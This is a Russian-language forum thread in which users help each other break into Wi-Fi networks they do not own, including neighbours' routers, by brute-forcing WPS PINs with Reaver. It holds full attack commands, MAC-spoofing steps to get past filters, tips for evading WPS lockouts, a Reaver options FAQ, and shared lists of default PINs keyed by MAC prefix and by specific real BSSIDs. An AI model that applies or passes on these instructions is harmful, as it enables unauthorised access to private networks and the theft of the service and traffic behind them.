Хозяин не балуется, это у них сигнал балуется, советую что касается USB адаптеров смотреть сигнал в NetStumbler , не надо забывать о таком немаловажном показателе как качество, airodump RXQ показывает не коректно, лучше смотреть под виндой NetStumbler это очень наглаядно видно в этой проге, сигнал может быть и -50, но если он ввиде частокола толку от этого сигнала -0 хендшейк может и с 20-30ой попытки и получите, не факт , что он будет правильным, ривер точно работать не будет, ну и наконец, если даже и подключитесь к этой точке, инета вы не получете по причине плохого пинга.

user100
30.09.2012, 20:45
Используя wifi slax 4.2 ,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов ,однако при вводе этих маков с заранее известных пинов в программе WPS crackGUI ,она не выдает ожидаемого пина.КАК правильно дописать и дополнить базу в самой утилите?



Отправьте разрабам свои пины , они в базу их и добавят. Функция отправки реализована в самом GUI.

baragoz
01.10.2012, 04:53
Используя wifi slax 4.2,я открыл файл с базой пинов из утилиты WPS crackGUI.. и дописал там несколько мак. и пинов



Переписать файл WPSCrackGUI.gambas не так просто. Потребуется знание языков программирования. Проще вытянуть оттуда базу и тупо сохранить в каком-нибудь блокноте. В дальнейшем использовать эту базу при написании команд reaver-у в консоли. Я, например, использую базу в кляксе - проще и удобнее (правда работаю в wifislax 4.1, в 4.2 тормоза бесят). А, что касается, отправить разработчикам свои маки-пины, так вот пример: отправил сюда им свои шесть мак-пинов. и через неделю наблюдаю их в бета-версии 1.1.9., правда только три из них. Довольно оперативно, молодцы.

http://s019.radikal.ru/i613/1209/25/266d8efb87c8.jpg

ЗЫ:версию можно поменять, меняя в директории "/usr/bin" сам файл WPSCrackGUI. Вот, к примеру, версия 1.1.9 beta

FSD
05.10.2012, 15:39
Первый раз reaver попробовал в работе и почти обрадовался, однако он выдал мне только WPS ключик, а вот WPA пароль нет . Точка TP-LINK т.к. SSID не поменяли. Где то вроде инфа была что туполинки заплатку какую то сделали или я ошибаюсь?

jabberd
05.10.2012, 17:48
Первый раз reaver попробовал в работе и почти обрадовался, однако он выдал мне только WPS ключик, а вот WPA пароль нет .



У меня часто так бывает, что выдаёт только WPS PIN. Тогда я пробую коннектиться именно по нему (wpa_cli wps_reg BSSID PIN)

FSD
06.10.2012, 12:09
Занятно то что произошла ошибка, при повторном подборе все получилось, однако ключик в hex формате почемуто выдало и ssid другой почемуто))причем еще раз попробовал с найденным пином reaver запустить и он выдал другой шестнадцатиричный ключ. П.С. главное результат положительный . И вот еще вопросец,если АР лочит после перебора буквально 7-8 пинов то какую паузу между перебором нужно ставить или лок по количеству неправильных происходит? Просветите новичка .

Stranger@
09.10.2012, 15:54
У меня часто так бывает, что выдаёт только WPS PIN. Тогда я пробую коннектиться именно по нему (wpa_cli wps_reg BSSID PIN)



Прошу прощения, эту команду открывать через терминал root

или через reaver? Что то пробовал и так и так в BTR3 у меня не соединялось. Спасибо.

Rockstar7
13.10.2012, 16:18
Подскажите в чем проблем: Reaver 1.4 выдает

[!] WPS transaction failed (code: 0x03), re-trying last pin

[!] WPS transaction failed (code: 0x02), re-trying last pin

ну и бесконечно выдает одно и тоже

[+] Trying pin 12345670

Установленна Bt 5R3 и TL WN7200ND

Добавлено: oткатился на Reaver 1.3 вроде зарабало!

Westbam
14.10.2012, 22:48
Rockstar7

Удалось точку по хакать?

А то у меня схожая проблема, reaver 1.4 зацикливается на одном пине

Ривер 1.3 брутил 8 часов с нулевым результатом.

jabberd
16.10.2012, 18:09
Прошу прощения, эту команду открывать через терминал root

или через reaver? Что то пробовал и так и так в BTR3 у меня не соединялось. Спасибо.



В рутовом терминале. Сначала нужно запустить wpa_supplicant, например:

wpa_supplicant -Dwext -iwlan0 -C/var/run/wpa_supplicant -B

Затем запустить wpa_cli, и в его командной строке запускать wps_reg и по желанию - любые другие команды. Также можно в рутовой консоли набрать wpa_cli wps_reg $BSSID $PIN — тогда оно отработает эту команду и вернётся в терминал. Если всё сделано правильно, но всё равно не соединяется — тогда уже не знаю, у меня такое тоже было

Woest
16.10.2012, 23:56
у меня вокруг куча точек, и все точки от Укртелекома, которые он по акции раздает за один рупь. Практически везде включен wps, но при запуске reaver, перебирает 10 pin-кодов и потом все глухо. Кто нибудь решил эту проблему?

Тут забрасывали идею создать базу pin-кодов, но на нее откликнулись только несколько человек, и на этом интузиазм закончился. Лично меня интересует какой pin может быть у C8:64:C7 ?

Rockstar7
22.10.2012, 11:15
Rockstar7

Удалось точку по хакать?

А то у меня схожая проблема, reaver 1.4 зацикливается на одном пине

Ривер 1.3 брутил 8 часов с нулевым результатом.



Нет так и не получилось. Специально взял dir 615 настроенный по дефолту на нем те же самые ошибки, полез в настройки и заметил что по умолчание выбраны две галочки , наталкивает на мысль что хоть и показывает наличие wps утилита wash работать он может только от нажатия хардвейной кнопочки с боку рутера. зы кто пины собирает этот стоковый от точки 1c7ee5.4622$$

Westbam
23.10.2012, 02:42
Rockstar7

На скрине только одна галка видна.."Disable WPS-PIN Method"

Пин на котором прога зацикливается он совпадает с тем что указано в настройках роутера?

Eddi
30.10.2012, 15:45
Из головы не выходит один вопрос, точнее 2, сам ответ найти не смог может, кто здесь подскажет или в какую сторону копать даст совет.

Итак:

1. "Раздолбил" благодаря неотключенному WPS некоторое количество точек доступа, к сожалению, большинство из них дали только пин-код. И все же от чего зависит: даст ли очередная БС пин и ключ или только пин, от версияи реализации ВПС или это всего навсего значит, что владелец данной БС, вообще, ключ не настраивал, а подключается исключительно по ВПС?

У какого какие мысли?

2. Подключаюсь к базе по пину (wpa_supplicant -Dwext -iwlan1 -C/var/run/wpa_supplicant -B

wpa_cli wps_reg - спасибо запостившему) в wpa_gui жму вкладку "edit" и там, о чудо, в прежде пустой строке "PSK" уже есть прописанная строка с ключом, которая, к сожалению, пока в виде "кружечков". Есть ли какая-либо возможность получить из нее ключ в читаемом виде?

Ну и раз пошла такая пьянка еще вопросик вдогонку. Подключаясь через wpa_gui к некоторым БС, не могу начать в них работу из-за того, что мой dhcp клиент не отсылает в сеть запросы на присвоение мне ip адреса (смотрю в wireshark), как его (dhcp- клиента) привести в чувство или где можно себе прописать ip? Раньше никогда такой проблемы не возникало ибо подключался через wicd, там все просто...

moaddip
01.11.2012, 14:57
от дир615 23180253

выдал вместе с паролем

Diman779
06.11.2012, 01:24
от дир615 23180253

выдал вместе с паролем



скажи пожалуйста , где можно найти пин коды для этих роутеров ????

20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530

20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530

00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP

00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ

Diman779
06.11.2012, 02:18
Можно ... в текущей версии 1.1.6 где-то так -

00:14:D1 26848185,1234XXXX
00:18:E7 15537782
00:19:15 12345670
00:19:70,00:21:29 64637129,22310298
00:24:17 31011193
00:26:44 7820XXXX,78202962
00:38:72 1562XXXX,18836486
00:48:7A 15471628
00:0C:F1 30447028
00:1A:2B 15624697,8847XXXX
00:1D:19,00:1D:7E 66026402
00:1D:73 88420707
00:4F:62 21207136
7C:4F:B5 75332662,72688656
A0:21:87 92442559
A0:21:B7 63825XXX,0634XXXX,01318104,6557XXXX
5C:33:8E 82848439,11765592
84:A8:E4 7996XX00
30:46:9A 9754XXXX,95221XXX,3444XXXX,344449XX,1504XXXX,19482 417
30:39:F2 1670XXXX,16538061,4329XXXX
50:67:F0 20064525
F4:EC:38 26599625,146076XX,1452XXXX,18674095
F4:3E:61 58:6D:8F 47158382,69382161
94:44:52 93645348
08:86:3B 21250491
40:4A:03 11866428
64:68:0C 7996XXXX
88:25:2C 7654XXXX,03526859
04:C0:6F 0751XXXX
20:4E:7F 45197079
20:2B:C1 1957XXXX
F8:D1:11 4867XXXX
F4:C7:14,C4:3D:C7 5141XXXX
B0:48:7A 0055XXXX,54335677,1111XXXX
1C:7E:E5 6041XXXX,22609298,60418579
38:60:77,CC:96:77,C0:C1:C0 78985933,7898XXXX
C0:AC:54,C0:3F:0E 8345XXXX,2585XXXX,2503XXXX
34:08:04 36022656,93395274
74:44:01 3555XXXX,00446747
BC:76:70 6326xxxx
00:1D:CE 85560130
58:98:35 53890894
DC:0B:1A 1653XXXX
38:72:C0 12345678
72:C0:6F 3863XXXX
6A:C7:14 3205XXXX
CO:3F:0E 8321XXXX
72:A8:E4 3357XXXX
62:C0:6F 3663XXXX
00:0B:3B 3814XXXX
00:24:01 97744757
E0:CB:4E 62987523
00:26:CE 1148XXXX,11446958,7026XXXX,7047XXXX,9566XXXX

База постоянно обновляется


а есть для этих мас ???

20:F3:A3:47: DA:1B -77 31 3 0 1 54e WPA2 TKIP PSK HG530

20:F3:A3:44:83:74 -85 1 1 0 1 54 WEP WEP HG530

00:0B:2B:3D:F7:EC -89 28 0 0 3 54 . WPA2 CCMP PSK ACORP

00:0B:2B:51:C5:B0 -86 22 2 0 11 54 WPA2 CCMP PSK ACORP-7(пїЅ.пїЅ

user_bad
12.11.2012, 23:22
zyxel

CC:5D:4E:4E:AE:AB

51565220

vedemur
12.11.2012, 23:27
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one

и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.

Sending Authentication Request (Open System) [ACK]

Authentication Successfull

Sending association Request [ACK]

Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.

При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.

saxa
13.11.2012, 19:50
zyxel

CC:5D:4E:4E:AE:AB

51565220




hex=4EAEAB

dec=5156523

Делай вывод и так большинство роутеров

vedemur
13.11.2012, 21:36
Спасибо, но я не знаю что с этим делать, научите п.ж. Буду благодарен.

kachinski
16.11.2012, 16:04
Всем привет, прочитал весь форум по этой теме и многое чего почерпнул для себя, но есть вопрос: Прошу вашей помощи взломать точку WPA. В Reaver (BT5) стопорится на этом:

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

WPS включен, т.е. точка прсутствует при команде Wash -i mon0 -C -s. Вначале запустил aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one

и через некоторое время выдало, что соединения нет и показало список возможных причин и на первом месте было указано,что включен фильтр по МАС адресу, остальные-не стоили внимания.Тогда подменил МАС на клиентский и запустил airodump-ng mon0 -c 1, a в другом терминале- aireplay-ng -1 1 -a BSSID -e ESSID mon0 --ignore-negative-one и мне показало, что соединение есть, т.е.

Sending Authentication Request (Open System) [ACK]

Authentication Successfull

Sending association Request [ACK]

Association succesfull(AID:1), потом в первом терминале запустил reaver и ступор тот-же. Что посоветуете. Использую Rtl8187L, сигнал хороший.

При работе в reaver с дефолтным МАС я вижу, что через некоторое время роутер меня отключает, а при подменённым МАС связь держится постоянно, как показывает aireplay. Заранее благодарю.



Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.

У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.

user100
16.11.2012, 17:32
Кстати с подмененным MAC как я заметил нужно входить только когда на точке нету этого самаого клиента, а то что показывает якобы висит поддельный MAC возможно то вовсе и не ваш, а реального клиента.

У меня еще хуже ситуация, долбил точку всю ночь, дошел до 99% с копейками, а с утра ее отключили. Airodump-ng тоже не показывает ее наличия, хорошо что reaver сохраняет прогресс.



Бывает , что точка доступа зависает от слишком частого запроса PIN . Пока не перезагрузят, АР не оклемается.

Можно попробовать увеличить задержку между попытками: reaver -i mon0 -b 00:01:02:03:04:05 -d 5 -S -v (можно выставит задержку от 5 до 15 сек.).

seonan
17.11.2012, 01:00
WPS PIN для таких MAC точек доступа:

54:04:A6:5D:50... 238373##

F81:11:32:1F... 961446##

B0:48:7A:F5:7B... 090061##

pav087
19.11.2012, 12:45
Привет всем!

Может поможете чем...

Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.

Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):


Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)

Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:


[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin)
...
[+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):


Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...

С другими точками подбор идет...

Из за чего может быть эта ошибка-Receive timeout occurred??

Заранее Спасибо!

Buran
19.11.2012, 13:49
...

Из за чего может быть эта ошибка-Receive timeout occurred??

Заранее Спасибо!



Думается варианта тут всего два:

1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.

2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.

pav087
19.11.2012, 15:30
Думается варианта тут всего два:

1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.

2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.



Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.

По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...

Делал так:


ifconfig wlan0 down
macchanger -m (мак клиента) wlan0
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
handshake ловится практически сразу, но брут не помогает...

теща
19.11.2012, 16:00
тема для брута http://forum.antichat.ru/thread274700.html

Buran
19.11.2012, 16:04
Делал так...



Нужно сменить МАС-адрес на интерфейсе. Делаем так:


ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up

Это будет совсем другое дело. Macchanger берём здесь если нету.

pav087
19.11.2012, 17:11
Нужно сменить МАС-адрес на интерфейсе. Делаем так:


ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up

Это будет совсем другое дело. Macchanger берём здесь если нету.



Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?

Buran
20.11.2012, 09:02
Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?



Нет.

pav087
20.11.2012, 10:36
Нет.



В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... Сигнал до точки ~ -59db. Клиента ~ -56db.

Может точка заблокировала WPS до перезагрузки?

Ведь как только начал подбирать, дошло до 11% за час...

Может есть какие-нибудь еще идеи?

Buran
20.11.2012, 12:10
Может есть какие-нибудь еще идеи?


На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.

pav087
20.11.2012, 13:03
На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.



Изначально начался подбор на родном маке TL-WN7200ND, но дошел до 11% и все никак, тепер WARNING: Receive timeout occurred лезет и всё, хоть сначала подбирай или с последнего пина всеравно ошибки..

Мак подставлял клиента, который ассоциировался на этой точке, но также пробовал запускать ривер с 2-x других wifi карт соответственно с разными маками, та же беда лезет, хотя на этих картах другие точки также ломались как и на TL-WN7200ND...

vedemur
20.11.2012, 18:09
Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

с другими- [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

и так 10 раз и ступор.

Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.

user_bad
24.11.2012, 23:10
Спасибо за советы, но так и ничего не получается, при смене МАС с одними командами выдаёт [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

с другими- [+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[+] Received identity request

[+] Sending identity response

и так 10 раз и ступор.

Попробовал ещё одну точку, доходит до 90.90% при пине 99985677 и без конца повторяет. Запускал реавер снуля - то же, запускал этот пин-идёт всё по кругу. Но заметил, что сообщения идут только М1,М2,М3,М4, а М5 и М6 не было ни разу. Что это? Подскажите. Заранее спасибо.



второй случай имею на роутере NETGEAR и ничего не получается, как будто М5 вообще не бывает, переставлял цифирку подбор идет дальше но результата нет...

pav087
26.11.2012, 10:54
Отпишусь по своей проблеме - WARNING: Receive timeout occurred

Отключили в доме свет не надолго, подбор пошел опять, видимо точка блокировалась, а после перезагрузки опять давала подобрать.

PIN

80:1F:02:06:x:x - 686018xx может кому пригодится...

SubFear
27.11.2012, 11:35
F1! F1! F1!

BackTrack 5 R3 BlackHat

root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv

Reaver v1.4 WiFi Protected Setup Attack Tool

Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner

[+] Switching mon0 to channel 11

[+] Waiting for beacon from 52:26:ED:8F:4D:E2

[+] Associated with 52:26:ED:8F:4D:E2 (ESSID: HDS)

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

[+] Sending identity response

[!] WARNING: Receive timeout occurred

[+] Sending WSC NACK

[!] WPS transaction failed (code: 0x02), re-trying last pin

[+] Trying pin 12345670

[+] Sending EAPOL START request

[+] Received identity request

root@bt:~# wash -i mon0 -C -s

Wash v1.4 WiFi Protected Setup Scan Tool

Copyright (coffee) 2011, Tactical Network Solutions, Craig Heffner

BSSID Channel RSSI WPS Version WPS Locked ESSID

---------------------------------------------------------------------------------------------------------------

14:A9:E3:03:24:22 1 -84 1.0 No dmitriyconshin

14:A9:E3:02:4B:3A 1 -81 1.0 No Domolink_451608_R_msk

00:26:5A:319:50 1 -86 1.0 No dlink

C8:6C:87:41:25:1F 1 -76 1.0 No O_O

50:67:F0:16:FE:3C 1 -87 1.0 No Andrey

14:A9:E3:01:50:0E 1 -87 1.0 No DOMOLINK_FREEPORT_01500E

B0:B2C:3C:7C:30 1 -86 1.0 No Domolink_532202_R_msk

14:A9:E3:02:18:C6 3 -80 1.0 No DOMOLINK_FREEPORT_0218C6

34:08:04:14:7C:BE 6 -86 1.0 No dlink

20:CF:30:CE:10:59 11 -86 1.0 No mksbag

пробовал включать aireplay-ng но как он должен работать я не в курсе. не помогло. я вообще в линуксе 0. пока иду на ощупь, с закрытыми глазами. помогите плз. может советом, может ссылочкой на мануальчик. сейчас думаю попробовать wifislax 4.2 final/ может он поможет. только какие там команды прописывать....

та сетка которую я пытаюсь нагнуть имеет самый сильный сигнал. в wash она присутствует. просто в поле копирования не попала.

кстати. я пробовал reaverom все сетки корячить. и у всех одно и тоже. ломанул только одну. с совершенно убогим сигналом. минут за 20.

user100
27.11.2012, 11:53
F1! F1! F1!

root@bt:~# reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS --nack -t 10 --eap-terminate -vv.



Рекомендую прописать команду следующим образом:

reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

Опция -a, позволяет оптимизировать работу Reaver.

Про доп опции к Reaver почитайте тут.

Уверены, что на точке "HDS" включен WPS ?

В приведенном вами списке wash её нет.

SubFear
27.11.2012, 12:04
Рекомендую прописать команду следующим образом:

reaver -i mon0 -b 52:26:ED:8F:4D:E2 -c 11 -e HDS -a -S -vv

Подставляя опцию - S ( --dh-smal ) Reaver задает небольшое значение секретного ключа, тем самым облегчая расчеты на стороне точки.

Опция -a, позволяет оптимизировать работу Reaver.

Про доп опции к Reaver почитайте тут.

Уверены, что на точке "HDS" включен WPS ?<br/>
В приведенном вами списке wash её нет.


вчера пробовал прописывать -vv --dh-small результат тот же.

в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.

user100
27.11.2012, 12:52
вчера пробовал прописывать -vv --dh-small результат тот же.

в списке wash она есть. просто точпадом не смог растянуть поле выделения на столько, чтобы она туда попала. я в линуксе вообще 0. 3 дня назад его первый раз увидел.



Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.

SubFear
27.11.2012, 13:46
Ошибки «timeout» могут возникать из за слабого сигнала Точки доступа.



хороший сигнал по всей квартире. предполагаю что это ктото из соседей снизу либо сверху. у меня 1 с очень хорошим сигналом 3-4 с нормальным. и ещё 5-7 со слабым. вот одну со слабым я ломанул а с остальными такая вот засада.

Oxy
02.12.2012, 01:42
Взломал давно dir-615 c помощью dwa-510 + самопальная антенна, заняло около 10 суток, дак сейчас пароль хозяева сменили, а я пин забыл , точнее последние 4 цифры. Сейчас приспособил роутер с openwrt для этого дела. А вообще, плохи дела становятся с уязвимостью, почти все современные роутеры идут с отключенным wps. У меня из 15 сетей только 2 определяются как уязвимые.

slavtan
03.12.2012, 03:04
А у меня точки вырубаются! По началу ключики перебираются с нормальной скоростью, а после полусуток резко вырубаются с эфира! Пока на двух заметил, и без разницы после или до 90%.Третью взломал с редким названием KINEETIC, она сразу "отдалась" т.к. пин ее - все нули! Ну я от радости полез в админку роутера, оно естественно под паролем.После нескольких попыток точка исчезла с эфира! Сканил под wifislax. Удалось еще без осложнений вскрыть nrendnet.

Пассы в 14 символов наверно не одним словарем радужным ни когда не подобрать.

denis839
04.12.2012, 11:34
Добрый день.

Сталкнулся с такой проблемкой:

reaver перебирает ПИН, потом (процентов через 5 ) пишет что нет ассоциации с точкой. При проверке выясняется, что WPS отключается. Сигнал отличный. Когда выключают свет или выполняют перезагрузку точки WPS опять активен на следующие примерно 5% перебора.

Пробовал менять MAC адрес адаптера на MAC адрес клиента - не помогло.

Вопрос в следующем: как избежать отказа асоциации и отключения WPS и как заставить перезагрузиться точку после отключения WPS для дальнейшего его включения.

P.S. накипело, нескем поделиться и посоветоваться: есть точки на которых включен WPS но при запуске reaver сканирует каналы, но ничего не происходит. С чем это связано?

Заранее благодарен.

ivans39
08.12.2012, 00:12
Интересная функция позволяет приостановить перебор на определенное время после определенного количества попыток и затем его продолжить, не создавая лишнего “подозрения” у АР. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -r 8:20

ivans39
08.12.2012, 00:16
1.Уровень сигнала 2.Reaver это все таки brut force и у кого то PIN начинался с 1111 а у кого то 9999 алгоритм работы reaver, сперва пины по default а затем по порядку. –S все таки полезная функция. 3.Защита на AP. Перезапуск с –vv а не просто -v дает более обширную информация что происходит с АР. У многих возникали вопросы по поводу reaver, вот не большой FAQ по материалам сети с небольшими комментами от меня. Думаю, он будет полезен. Почему возникают ошибки "timeout" и "out of order"? - Обычно это происходит из-за низкого уровня сигнала и плохой связи сточкой доступа. Кроме того, точка доступа может на время заблокировать использование WPS. Почему при плохом сигнале Reaver работает плохо, хотя тот же взлом WEP проходит нормально? - Взлом WEP происходит путем повторной пересылки перехваченных пакетов, чтобы получить векторы инициализации (IV), необходимых для успешного взлома. В этом случае неважно, потерялся какой-либо пакет, либо как-то был поврежден по пути. А вот для атаки на WPS необходимо строгое следование протоколу передачи пакетов между точкой доступа и Reaver для проверки каждого PIN-кода. Это делает атаки на WPS гораздо более зависимыми от уровня сигнала. Важно помнить, что если твой беспроводной адаптер видит точку доступа, то это ещё не значит, что и точка доступа видит тебя. Почему я постоянно получаю ошибки "rate limiting detected"? - Точка доступа заблокировала WPS. Обычно блокировка длится около пяти минут, но в некоторых случаях возможна полная “падение” АР - и только reset способен вернуть точку к “жизни”. Дополнительные опции, Reaver, которые могут повысить эффективность перебора ключа WPS. Можно задать номер канала -с и -е SSID точки доступа: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx (-S) '--dh-small' Полезная опция, которая задает небольшое значение PIN, тем самым облегчая работу reaver: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --dh-small (-t) --timeout Таймаут ожидания ответа по умолчанию равен пяти секундам. При необходимости его можно изменить: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -t 2 (-d) --delay Задержка между попытками по умолчанию равна одной секунде. Она также может быть настроена: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -d 5 (-l) --lock-delay Некоторые точки доступа могут блокировать WPS на определенное время. Reaver делает паузу в переборе на 315 секунд по умолчанию, длительность этой паузы можно менять: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --lock-delay=320 (-n) --nack Некоторые реализации протокола WPS разрывают соединение при неправильном PIN-коде, хотя по спецификации должны возвращать особое сообщение. Reaver автоматически распознает такую ситуацию, для этого существует опция: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --nаск' (-E) --eap-terminate. Опция предназначена для работы с теми АР, которые требуют завершения WPS-сессии с помощью сообщения ЕАР FAIL: reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --eap-terminate (-L), --ignore-locks Игнорирование блокировки WPS-сессии. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --ignore-locks (-x) --fail-wait. Возникновение ошибок в WPS-сессии может означать, что АР ограничивает число попыток ввода PIN-кода, либо просто перегружена запросами. В этом случае Reaver приостанавливает свою деятельность после 10 попыток, на установленную временную паузу. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx --fail-wait=360 (-T), --m57-timeout Установка интервала времени для M5/M7 - иногда помогает. По умолчанию 0.1 возможно увеличение до 1 сек. reaver -i mon0 -b 00:00:00:00:00:00 -с 11 -е xxxxxx -T .5 (-A), --no-associate. Отмена авторизации на АР, немного ускоряет процесс перебора PIN. reaver -i mon0 -А -b 00:00:00:00:00:00 -с 11 -е xxxxxx Авторизация должна быть запущенна отдельно. aireplay-ng mon0 -1 120 -a 00:00:00:00:00:00 -е xxxxxx (-p), --pin Если PIN уже подобран - иногда помогает увидеть WPA в “нормальном” виде (не НЕХ). Или возможен перебор сразу с установленного 